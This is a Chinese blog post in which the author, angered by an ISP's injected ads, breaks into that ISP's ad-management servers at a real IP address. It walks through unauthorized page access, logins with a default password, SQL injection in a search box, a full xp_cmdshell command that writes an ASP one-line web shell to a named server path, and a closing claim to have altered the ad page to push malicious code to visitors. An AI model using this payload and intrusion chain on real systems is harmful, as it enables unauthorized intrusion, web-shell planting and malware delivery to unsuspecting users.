最近被铁通恶意插入的广告搞的蛋疼 投诉无门 自己搞定

前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了

最近倒是不跳了 不管登陆什么网站 右下角总弹出一些风格一样的广告

F12看了一下广告图片的地址

http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif

查下IP地址: 61.235.249.195辽宁省沈阳市 铁通

这不我大铁通的IP么 难道被劫持了？

百度之 果然是运营商劫持 顿时我就不开心了 本来前几天学长们毕业心情就不好 你还给我弹广告！

扫描了一下 找到两个后台地址：

http://61.235.249.195:808

http://61.235.249.195:6789

 

简单试了一下弱口令 万能密码 无效...好失落...

丢到wwwsacn里 也没扫到什么用处较大的信息

不过根据以前的经验 猜到这类外观比较挫的网站安全性都比较差 就开始试能不能越权

越权漏洞：

http://61.235.249.195:6789/ManageFrame/left.aspx

不行

http://61.235.249.195:6789/ManageFrame/top.aspx

哎呦 这个可以！虽然用处不大...不过 总比啥都没有强！

 

下载了帮助文档...发现原来这个系统还可以DNS劫持！

之后又是一顿瞎猜 不过没什么收货了

不过那个个人设置吸引了我的注意力

http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx

估计因为没参数 所以内容都是空白的

不过他的文件命名引起了我的兴趣 尝试修改了一下

http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx

哎呦 路径被爆出来了

 

换808那个后台再访问下

http://61.235.249.195:808/Common/UserManage/UserEdit.aspx

页面成功加载出来了

 

然后 手欠的点了下取消 人品顿时爆发了

http://61.235.249.195:808/Common/UserManage/UserList.aspx

 

这个用户有点少 我们换回6789

 

我尝试添加了一个用户 成功了 不过登陆时提示未分配角色

但创建用户时的一句话引起了我的注意 

 

初始密码为1



越权页面：

http://61.235.249.195:6789/Common/UserManage/UserList.aspx

添加用户

http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx

给予管理权限



密码弱口令：

随便找了个账号 就第一个吧 密码1 哦也 进去了~

 

不过这都不是我的目的啊

我需要的是管理账号给自己的账号加白名单啊！然后我想到了注入！



注入点：

突然想到在http://61.235.249.195:6789/Common/UserManage/UserList.aspx

还有搜功能 会不会存在注入呢？来个引号试试！

人品再次爆发！
 

 

然后发现竟然是sa权限 xp_cmdshell还没删除 发完这个漏洞我觉得我应该去买个彩票

路径也有了 直接写shell啊！

直接搜索cttjs';exec master..xp_cmdshell 'echo ^<%eval request(Chr(97))%^>>f:\浙江\IIOSManageWeb_主线08211\Common\UserManage\a.asp';--

写入一句话http://61.235.249.195:808/Common/UserManage/a.asp a

 

推送挂马：

入侵期间发现广告的一些管理页面无法访问 做了IP限制？

不过这阻止不了有心的黑客们

翻了一下 找到了广告页面的文件 F:\IIIOS素材\Default.aspx

修改下 加点语句 神不知鬼不觉...